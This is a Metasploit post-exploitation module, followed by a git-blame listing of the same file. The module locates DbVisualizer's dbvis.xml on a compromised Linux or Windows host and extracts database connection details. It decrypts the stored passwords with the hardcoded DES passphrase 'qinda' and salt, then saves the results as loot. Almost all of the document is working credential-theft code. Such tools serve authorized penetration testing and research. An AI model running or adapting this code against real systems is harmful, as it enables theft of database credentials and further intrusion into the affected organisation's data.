metasploit-framework/modules/post/multi/gather/dbvis_enum.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'
require 'msf/core/auxiliary/report'
require 'openssl'
require 'digest/md5'

class Metasploit3 < Msf::Post

  include Msf::Post::File
  include Msf::Post::Unix
  include Msf::Auxiliary::Report

  def initialize(info={})
    super( update_info( info,
        'Name'          => 'Multi Gather DbVisualizer Connections Settings',
        'Description'   => %q{
          DbVisualizer stores the user database configuration in dbvis.xml.
          This module retrieves the connections settings from this file and decrypts the encrypted passwords.
        },
        'License'       => MSF_LICENSE,
        'Author'        => [ 'David Bloom' ], # Twitter: @philophobia78
        'Platform'      => %w{ linux win },
        'SessionTypes'  => [ 'meterpreter', 'shell']
      ))
    register_options(
      [
        OptString.new('PASSPHRASE', [false, 'The hardcoded passphrase used for encryption']),
        OptInt.new('ITERATION_COUNT', [false, 'The iteration count used in key derivation', 10])
      ], super.class)
  end

  def run

    oldversion = false

    case session.platform
    when /linux/
      user = session.shell_command('whoami').chomp
      print_status("Current user is #{user}")
      if user =~ /root/
        user_base = "/root/"
      else
         user_base = "/home/#{user}/"
      end
      dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"
    when /win/
      if session.type =~ /meterpreter/
        user_profile = session.sys.config.getenv('USERPROFILE')
      else
        user_profile = cmd_exec("echo %USERPROFILE%").strip
      end
      dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"
    end

    unless file?(dbvis_file)
      # File not found, we next try with the old config path
      print_status("File not found: #{dbvis_file}")
      print_status('This could be an older version of dbvis, trying old path')
      case session.platform
      when /linux/
        dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"
      when /win/
        dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml"
      end
      unless file?(dbvis_file)
        print_error("File not found: #{dbvis_file}")
        return
      end
      oldversion = true
    end

    print_status("Reading: #{dbvis_file}")
    print_line()
    raw_xml = ""
    begin
      raw_xml = read_file(dbvis_file)
    rescue EOFError
      # If there's nothing in the file, we hit EOFError
      print_error("Nothing read from file: #{dbvis_file}, file may be empty")
      return
    end

    if oldversion
      # Parse old config file
      db_table = parse_old_config_file(raw_xml)
    else
      # Parse new config file
      db_table = parse_new_config_file(raw_xml)
    end

    if db_table.rows.empty?
      print_status('No database settings found')
    else
      print_line
      print_line(db_table.to_s)
      print_good('Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun!')
      print_line()
      # Store found databases in loot
      p = store_loot('dbvis.databases', 'text/csv', session, db_table.to_csv, 'dbvis_databases.txt', 'dbvis databases')
      print_good("Databases settings stored in: #{p.to_s}")
    end

    print_status("Downloading #{dbvis_file}")
    p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config")
    print_good "dbvis.xml saved to #{p.to_s}"
  end

  # New config file parse function
  def parse_new_config_file(raw_xml)

    db_table = Rex::Ui::Text::Table.new(
    'Header'    => "DbVisualizer Databases",
    'Indent'    => 2,
    'Columns'   =>
    [
      "Alias",
      "Type",
      "Server",
      "Port",
      "Database",
      "Namespace",
      "UserID",
      "Password"
    ])

    dbs = []
    db = {}
    dbfound = false
    version_found = false
    # fetch config file
    raw_xml.each_line do |line|

      if version_found == false
        version_found = find_version(line)
      end

      if line =~ /<Database id=/
        dbfound = true
      elsif line =~ /<\/Database>/
        dbfound = false
        if db[:Database].nil?
          db[:Database] = "";
        end
        if db[:Namespace].nil?
          db[:Namespace] = "";
        end
        # save
        dbs << db if (db[:Alias] and db[:Type] and  db[:Server] and db[:Port] )
        db = {}
      end

      if dbfound == true
        # get the alias
        if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i
          db[:Alias] = $1
        end

        # get the type
        if line =~ /<Type>([\S+\s+]+)<\/Type>/i
          db[:Type] = $1
        end

        # get the user
        if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
          db[:UserID] = $1
        end

        # get user password
        if line =~ /<Password>([\S+\s+]+)<\/Password>/i
          enc_password = $1
          db[:Password] = decrypt_password(enc_password)
        end

        # get the server
        if line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i
          db[:Server] = $1
        end

        # get the port
        if line =~ /<UrlVariable UrlVariableName="Port">([\S+\s+]+)<\/UrlVariable>/i
          db[:Port] = $1
        end

        # get the database
        if line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i
          db[:Database] = $1
        end

        # get the Namespace
        if line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i
          db[:Namespace] = $1
        end
      end
    end

    # Fill the tab and report eligible servers
    dbs.each do |db|
      if ::Rex::Socket.is_ipv4?(db[:Server].to_s)
        print_good("Reporting #{db[:Server]}")
        report_host(:host =>  db[:Server]);
      end

      db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:UserID], db[:Password] ]
    end
    return db_table
  end

  # New config file parse function
  def parse_old_config_file(raw_xml)

    db_table = Rex::Ui::Text::Table.new(
    'Header'    => 'DbVisualizer Databases',
    'Indent'    => 2,
    'Columns'   =>
    [
      'Alias',
      'Type',
      'URL',
      'UserID',
      'Password'
    ])

    dbs = []
    db = {}
    dbfound = false
    version_found = false

    # fetch config file
    raw_xml.each_line do |line|

      if version_found == false
         vesrion_found = find_version(line)
      end

      if line =~ /<Database id=/
        dbfound = true
      elsif line =~ /<\/Database>/
        dbfound = false
        # save
        dbs << db if (db[:Alias] and db[:Url] )
        db = {}
      end

      if dbfound == true
        # get the alias
        if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i
          db[:Alias] = $1
        end

        # get the type
        if line =~ /<Type>([\S+\s+]+)<\/Type>/i
          db[:Type] = $1
        end

        # get the user
        if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i
          db[:UserID] = $1
        end

        #get the user password
        if line =~ /<Password>([\S+\s+]+)<\/Password>/i
          enc_password = $1
          db[:Password] = decrypt_password(enc_password)
        end

        # get the server URL
        if line =~ /<Url>(\S+)<\/Url>/i
          db[:URL] = $1
        end

      end
    end

    # Fill the tab
    dbs.each do |db|
      if (db[:URL] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i)
        if ::Rex::Socket.is_ipv4?($1.to_s)
          print_good("Reporting #{$1}")
          report_host(:host => $1.to_s)
        end
      end
      db_table << [ db[:Alias] , db[:Type] , db[:URL], db[:UserID], db[:Password] ]
    end
    return db_table
  end

  def find_version(tag)
    found = false
    if tag =~ /<Version>([\S+\s+]+)<\/Version>/i
      found = true
      print_good("DbVisualizer version: #{$1}")
    end
    found
  end

  def decrypt_password(enc_password)
    enc_password = Rex::Text.decode_base64(enc_password)
    dk, iv = get_derived_key
    des = OpenSSL::Cipher.new('DES-CBC')
    des.decrypt
    des.key = dk
    des.iv = iv
    password = des.update(enc_password) + des.final
  end

  def get_derived_key
    key = passphrase + salt
    iteration_count.times do
      key = Digest::MD5.digest(key)
    end
    return key[0,8], key[8,8]
  end

  def salt
    [-114,18,57,-100,7,114,111,90].pack('C*')
  end

  def passphrase
    datastore['PASSPHRASE'] || 'qinda'
  end

  def iteration_count
    datastore['ITERATION_COUNT'] || 10
  end

end
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
			`##`

			`require 'msf/core'`
			`require 'msf/core/auxiliary/report'`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`require 'openssl'`
			`require 'digest/md5'`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00
			`class Metasploit3 < Msf::Post`

			`include Msf::Post::File`
			`include Msf::Post::Unix`
			`include Msf::Auxiliary::Report`

			`def initialize(info={})`
			`super( update_info( info,`
Correct DbVisualizer title name I think "DbVis Software" is the name of the company and the product itself is called DbVisualizer. Also fixed the description on the WPTouch module. 2014-07-21 17:35:01 +00:00			`'Name' => 'Multi Gather DbVisualizer Connections Settings',`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`'Description' => %q{`
			`DbVisualizer stores the user database configuration in dbvis.xml.`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`This module retrieves the connections settings from this file and decrypts the encrypted passwords.`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`},`
			`'License' => MSF_LICENSE,`
Author's Twitter handle should be a comment msfconsole treats whatever is in <> as the author's email, not twitter handle 2014-07-14 19:57:36 +00:00			`'Author' => [ 'David Bloom' ], # Twitter: @philophobia78`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`'Platform' => %w{ linux win },`
			`'SessionTypes' => [ 'meterpreter', 'shell']`
			`))`
Add datastore options 2015-05-28 05:58:36 +00:00			`register_options(`
			`[`
			`OptString.new('PASSPHRASE', [false, 'The hardcoded passphrase used for encryption']),`
			`OptInt.new('ITERATION_COUNT', [false, 'The iteration count used in key derivation', 10])`
			`], super.class)`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`end`

			`def run`

Pass msftidy 2014-07-15 16:31:37 +00:00			`oldversion = false`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00
			`case session.platform`
			`when /linux/`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`user = session.shell_command('whoami').chomp`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`print_status("Current user is #{user}")`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if user =~ /root/`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`user_base = "/root/"`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`else`
Pass msftidy 2014-07-15 16:31:37 +00:00			`user_base = "/home/#{user}/"`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`end`
			`dbvis_file = "#{user_base}.dbvis/config70/dbvis.xml"`
			`when /win/`
			`if session.type =~ /meterpreter/`
			`user_profile = session.sys.config.getenv('USERPROFILE')`
			`else`
			`user_profile = cmd_exec("echo %USERPROFILE%").strip`
			`end`
			`dbvis_file = user_profile + "\\.dbvis\\config70\\dbvis.xml"`
			`end`

I mean "unless", not "if" 2014-07-14 20:24:53 +00:00			`unless file?(dbvis_file)`
Pass msftidy 2014-07-15 16:31:37 +00:00			`# File not found, we next try with the old config path`
Added compatibility with dbvis <= 6 Checking for "config" folder existence if "config70" is not found. 2014-07-15 10:14:38 +00:00			`print_status("File not found: #{dbvis_file}")`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`print_status('This could be an older version of dbvis, trying old path')`
Update dbvis_enum.rb 2014-07-15 10:33:07 +00:00			`case session.platform`
Added compatibility with dbvis <= 6 Checking for "config" folder existence if "config70" is not found. 2014-07-15 10:14:38 +00:00			`when /linux/`
Pass msftidy 2014-07-15 16:31:37 +00:00			`dbvis_file = "#{user_base}.dbvis/config/dbvis.xml"`
Added compatibility with dbvis <= 6 Checking for "config" folder existence if "config70" is not found. 2014-07-15 10:14:38 +00:00			`when /win/`
Pass msftidy 2014-07-15 16:31:37 +00:00			`dbvis_file = user_profile + "\\.dbvis\\config\\dbvis.xml"`
Added compatibility with dbvis <= 6 Checking for "config" folder existence if "config70" is not found. 2014-07-15 10:14:38 +00:00			`end`
			`unless file?(dbvis_file)`
			`print_error("File not found: #{dbvis_file}")`
			`return`
			`end`
Pass msftidy 2014-07-15 16:31:37 +00:00			`oldversion = true`
File should be checked for existence before reading 2014-07-14 20:01:03 +00:00			`end`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00
Pass msftidy 2014-07-15 16:31:37 +00:00			`print_status("Reading: #{dbvis_file}")`
			`print_line()`
Account for EOFError condition 2014-07-14 20:27:40 +00:00			`raw_xml = ""`
			`begin`
			`raw_xml = read_file(dbvis_file)`
			`rescue EOFError`
			`# If there's nothing in the file, we hit EOFError`
			`print_error("Nothing read from file: #{dbvis_file}, file may be empty")`
			`return`
			`end`
Pass msftidy 2014-07-15 16:31:37 +00:00
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`if oldversion`
			`# Parse old config file`
fix msftidy warnings 2014-12-12 12:16:21 +00:00			`db_table = parse_old_config_file(raw_xml)`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`else`
			`# Parse new config file`
fix msftidy warnings 2014-12-12 12:16:21 +00:00			`db_table = parse_new_config_file(raw_xml)`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`end`
Account for EOFError condition 2014-07-14 20:27:40 +00:00
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`if db_table.rows.empty?`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`print_status('No database settings found')`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`else`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`print_line`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`print_line(db_table.to_s)`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`print_good('Try to query listed databases with dbviscmd.sh (or .bat) -connection <alias> -sql <statements> and have fun!')`
Added dbvis version find and print 2014-07-15 13:04:46 +00:00			`print_line()`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`# Store found databases in loot`
			`p = store_loot('dbvis.databases', 'text/csv', session, db_table.to_csv, 'dbvis_databases.txt', 'dbvis databases')`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`print_good("Databases settings stored in: #{p.to_s}")`
			`end`

			`print_status("Downloading #{dbvis_file}")`
			`p = store_loot("dbvis.xml", "text/xml", session, read_file(dbvis_file), "#{dbvis_file}", "dbvis config")`
			`print_good "dbvis.xml saved to #{p.to_s}"`
			`end`

			`# New config file parse function`
fix msftidy warnings 2014-12-12 12:16:21 +00:00			`def parse_new_config_file(raw_xml)`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00
			`db_table = Rex::Ui::Text::Table.new(`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`'Header' => "DbVisualizer Databases",`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`'Indent' => 2,`
			`'Columns' =>`
			`[`
			`"Alias",`
			`"Type",`
			`"Server",`
			`"Port",`
			`"Database",`
			`"Namespace",`
Consistent column names 2015-05-29 06:08:24 +00:00			`"UserID",`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`"Password"`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`])`
Pass msftidy 2014-07-15 16:31:37 +00:00
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`dbs = []`
			`db = {}`
			`dbfound = false`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`version_found = false`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`# fetch config file`
Account for EOFError condition 2014-07-14 20:27:40 +00:00			`raw_xml.each_line do \|line\|`
Added dbvis version find and print 2014-07-15 13:04:46 +00:00
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if version_found == false`
			`version_found = find_version(line)`
Added dbvis version find and print 2014-07-15 13:04:46 +00:00			`end`

Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`if line =~ /<Database id=/`
			`dbfound = true`
			`elsif line =~ /<\/Database>/`
Pass msftidy 2014-07-15 16:31:37 +00:00			`dbfound = false`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`if db[:Database].nil?`
			`db[:Database] = "";`
			`end`
			`if db[:Namespace].nil?`
			`db[:Namespace] = "";`
			`end`
			`# save`
			`dbs << db if (db[:Alias] and db[:Type] and db[:Server] and db[:Port] )`
			`db = {}`
			`end`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00
Change = to == This is an if condition, not an assignment 2014-07-14 19:53:27 +00:00			`if dbfound == true`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`# get the alias`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`db[:Alias] = $1`
			`end`

			`# get the type`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if line =~ /<Type>([\S+\s+]+)<\/Type>/i`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`db[:Type] = $1`
			`end`

			`# get the user`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i`
Consistent column names 2015-05-29 06:08:24 +00:00			`db[:UserID] = $1`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`end`

Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`# get user password`
			`if line =~ /<Password>([\S+\s+]+)<\/Password>/i`
			`enc_password = $1`
			`db[:Password] = decrypt_password(enc_password)`
			`end`

Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`# get the server`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if line =~ /<UrlVariable UrlVariableName="Server">([\S+\s+]+)<\/UrlVariable>/i`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`db[:Server] = $1`
			`end`

			`# get the port`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if line =~ /<UrlVariable UrlVariableName="Port">([\S+\s+]+)<\/UrlVariable>/i`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`db[:Port] = $1`
			`end`

			`# get the database`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if line =~ /<UrlVariable UrlVariableName="Database">([\S+\s+]+)<\/UrlVariable>/i`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`db[:Database] = $1`
			`end`

			`# get the Namespace`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if line =~ /<UrlVariable UrlVariableName="Namespace">([\S+\s+]+)<\/UrlVariable>/i`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00			`db[:Namespace] = $1`
			`end`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`end`
			`end`
Retabbed and reformatted 2014-07-14 19:39:34 +00:00
Pass msftidy 2014-07-15 16:31:37 +00:00			`# Fill the tab and report eligible servers`
+ not preferred 2014-07-14 20:14:54 +00:00			`dbs.each do \|db\|`
			`if ::Rex::Socket.is_ipv4?(db[:Server].to_s)`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`print_good("Reporting #{db[:Server]}")`
+ not preferred 2014-07-14 20:14:54 +00:00			`report_host(:host => db[:Server]);`
			`end`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00
Consistent column names 2015-05-29 06:08:24 +00:00			`db_table << [ db[:Alias], db[:Type], db[:Server], db[:Port], db[:Database], db[:Namespace], db[:UserID], db[:Password] ]`
+ not preferred 2014-07-14 20:14:54 +00:00			`end`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`return db_table`
			`end`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00
parse url to report host in old config 2014-07-15 12:21:09 +00:00			`# New config file parse function`
fix msftidy warnings 2014-12-12 12:16:21 +00:00			`def parse_old_config_file(raw_xml)`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00
			`db_table = Rex::Ui::Text::Table.new(`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`'Header' => 'DbVisualizer Databases',`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`'Indent' => 2,`
			`'Columns' =>`
			`[`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`'Alias',`
			`'Type',`
			`'URL',`
			`'UserID',`
			`'Password'`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`])`
Pass msftidy 2014-07-15 16:31:37 +00:00
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`dbs = []`
			`db = {}`
			`dbfound = false`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`version_found = false`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00
			`# fetch config file`
			`raw_xml.each_line do \|line\|`
Added dbvis version find and print 2014-07-15 13:04:46 +00:00
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if version_found == false`
			`vesrion_found = find_version(line)`
Added dbvis version find and print 2014-07-15 13:04:46 +00:00			`end`

Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`if line =~ /<Database id=/`
			`dbfound = true`
			`elsif line =~ /<\/Database>/`
Pass msftidy 2014-07-15 16:31:37 +00:00			`dbfound = false`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`# save`
			`dbs << db if (db[:Alias] and db[:Url] )`
			`db = {}`
			`end`

			`if dbfound == true`
			`# get the alias`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if line =~ /<Alias>([\S+\s+]+)<\/Alias>/i`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`db[:Alias] = $1`
			`end`

			`# get the type`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if line =~ /<Type>([\S+\s+]+)<\/Type>/i`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`db[:Type] = $1`
			`end`

			`# get the user`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if line =~ /<Userid>([\S+\s+]+)<\/Userid>/i`
Consistent column names 2015-05-29 06:08:24 +00:00			`db[:UserID] = $1`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`end`

Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`#get the user password`
			`if line =~ /<Password>([\S+\s+]+)<\/Password>/i`
			`enc_password = $1`
			`db[:Password] = decrypt_password(enc_password)`
			`end`

			`# get the server URL`
			`if line =~ /<Url>(\S+)<\/Url>/i`
Consistent column names 2015-05-29 06:08:24 +00:00			`db[:URL] = $1`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`end`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`end`
+ not preferred 2014-07-14 20:14:54 +00:00			`end`
DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`# Fill the tab`
			`dbs.each do \|db\|`
Consistent column names 2015-05-29 06:08:24 +00:00			`if (db[:URL] =~ /[\S+\s+]+[\/]+([\S+\s+]+):[\S+]+/i)`
parse url to report host in old config 2014-07-15 12:21:09 +00:00			`if ::Rex::Socket.is_ipv4?($1.to_s)`
Pass msftidy 2014-07-15 16:31:37 +00:00			`print_good("Reporting #{$1}")`
			`report_host(:host => $1.to_s)`
			`end`
parse url to report host in old config 2014-07-15 12:21:09 +00:00			`end`
Consistent column names 2015-05-29 06:08:24 +00:00			`db_table << [ db[:Alias] , db[:Type] , db[:URL], db[:UserID], db[:Password] ]`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00			`end`
			`return db_table`
For for missing an end 2014-07-14 20:17:54 +00:00			`end`
Old config file update Added functions to parse old and new config files. 2014-07-15 12:00:29 +00:00
fix msftidy warnings 2014-12-12 12:16:21 +00:00			`def find_version(tag)`
Pass msftidy 2014-07-15 16:31:37 +00:00			`found = false`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`if tag =~ /<Version>([\S+\s+]+)<\/Version>/i`
Pass msftidy 2014-07-15 16:31:37 +00:00			`found = true`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`print_good("DbVisualizer version: #{$1}")`
			`end`
			`found`
			`end`

			`def decrypt_password(enc_password)`
			`enc_password = Rex::Text.decode_base64(enc_password)`
			`dk, iv = get_derived_key`
			`des = OpenSSL::Cipher.new('DES-CBC')`
Add decryption.final for proper padding 2015-05-29 05:33:55 +00:00			`des.decrypt`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`des.key = dk`
			`des.iv = iv`
Add decryption.final for proper padding 2015-05-29 05:33:55 +00:00			`password = des.update(enc_password) + des.final`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`end`

			`def get_derived_key`
			`key = passphrase + salt`
			`iteration_count.times do`
			`key = Digest::MD5.digest(key)`
Pass msftidy 2014-07-15 16:31:37 +00:00			`end`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`return key[0,8], key[8,8]`
			`end`

			`def salt`
			`[-114,18,57,-100,7,114,111,90].pack('C*')`
			`end`

			`def passphrase`
Add datastore options 2015-05-28 05:58:36 +00:00			`datastore['PASSPHRASE'] \|\| 'qinda'`
Decrypt encrypted passwords 2015-05-28 05:21:00 +00:00			`end`

			`def iteration_count`
Add datastore options 2015-05-28 05:58:36 +00:00			`datastore['ITERATION_COUNT'] \|\| 10`
Added dbvis version find and print 2014-07-15 13:04:46 +00:00			`end`

DbVisualizer stores the user database configuration in dbvis.xml This module retrieves the connections settings from this file 2014-07-14 18:08:48 +00:00			`end`